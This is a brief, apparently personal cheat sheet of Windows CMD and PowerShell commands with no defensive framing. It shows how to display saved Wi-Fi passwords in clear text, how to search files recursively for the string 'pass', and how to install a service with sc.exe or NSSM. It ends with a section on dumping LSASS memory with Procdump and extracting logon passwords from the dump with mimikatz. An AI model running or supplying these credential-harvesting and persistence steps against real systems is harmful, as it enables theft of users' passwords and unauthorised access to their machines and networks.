1. Run CMD as Admin

# How To Find Wi-Fi Password Using CMD

1. Type the command "***netsh wlan show profile****"* to find which WIFI profiles you have ever connected to.
2. Type the command to fine the password "***netsh wlan show profile WiFi-name key=clear****"*
3. Under the security settings, in the ‘key content’, you see the WiFi password of that particular network.

# [How to do file search in CMD](https://stackoverflow.com/questions/8066679/how-to-do-a-simple-file-search-in-cmd)

1. **"Dir /s \*<file name>\*** "= search files/directories in the current folder and sub folders.
2. "**for /R %G in (\*) do (find "pass" %G)"**

# [How to creat](https://stackoverflow.com/questions/8066679/how-to-do-a-simple-file-search-in-cmd)e a service with sc.exe

1. Sc.exe create <ServiceName> binPath= "<the path>"
2. Use NSSM: 1) Download NSSM. 2) install service using: "nssm.exe install <serviseName>". 3)Use the GUI to locate your executable.

# How to dump Lsass using CMD/PowerShell

1. Type "**Procdump -ma lsass.exe lsassdump**"
2. Run mimikatz and: "**sekurlsa::Minidump lsassdump.dmp**"
3. Type "**sekurlsa::logonPasswords**"